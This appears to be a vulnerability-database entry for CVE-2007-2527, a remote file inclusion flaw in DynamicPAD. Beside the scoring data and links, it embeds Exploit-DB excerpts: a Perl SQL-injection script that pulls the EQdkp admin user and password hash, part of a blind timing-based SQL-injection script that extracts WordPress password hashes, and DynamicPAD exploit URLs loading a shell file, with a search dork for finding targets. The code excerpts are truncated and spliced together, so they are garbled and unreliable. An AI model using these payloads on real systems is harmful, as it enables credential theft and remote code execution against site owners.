CVE-2007-2527
Published 2007-05-08
Priority: P342, high. CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.64% (88.2th percentile)
Multiple PHP remote file inclusion vulnerabilities in DynamicPAD before 1.03.31 allow remote attackers to execute arbitrary PHP code via a URL in the HomeDir parameter to (1) dp_logs.php or (2) index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dynamicpad | dynamicpad | — | — |
No detection rules found.
Exploit-DB
CVE-2007-3077 EQdkp 1.3.2 - 'listmembers.php' SQL Injection
exploitdb · 2007-06-04
---
#!/usr/bin/perl -w
#################################################################################
# #
# EQdkp new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
print "-------------------------------------------------------------------------\r\n";
print " EQdkp content =~ /">(.*?)/){
print "[+] Admin User : $1\n";}
else {print "\n[-] Unable to retrieve admin username..."}
if($res->content =~ /">([0-9a-fA-F]{32})/){
print "[+] Admin Hash : $1";}
Exploit-DB
CVE-2007-2821 WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
exploitdb · 2007-05-21
---
$ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}
echo "\nFinal result: $field=$out\n\n";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post)
Exploit-DB
CVE-2007-2527 DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion
exploitdb · 2007-05-07
---
#DynamicPAD Remote file inclusion (HomeDir)
#Download script : http://dynamicpad.org/dp.tar.gz
#Thanks Str0ke
#Dork : "Powered By DynamicPAD"
#Exploit :
#http://victim.com/[dp_path]/dp_logs.php?HomeDir=shell.txt?
#http://victom.com/[dp_path]/index.php?HomeDir= shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger[at]Hotmail[dot]com
# milw0rm.com [2007-05-07]
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2007-May/001591.html
http://attrition.org/pipermail/vim/2007-May/001593.html
http://dynamicpad.org/
http://secunia.com/advisories/25176
http://www.securityfocus.com/bid/23861
http://www.vupen.com/english/advisories/2007/1681
https://exchange.xforce.ibmcloud.com/vulnerabilities/34125
https://www.exploit-db.com/exploits/3868
Published: 2007-05-08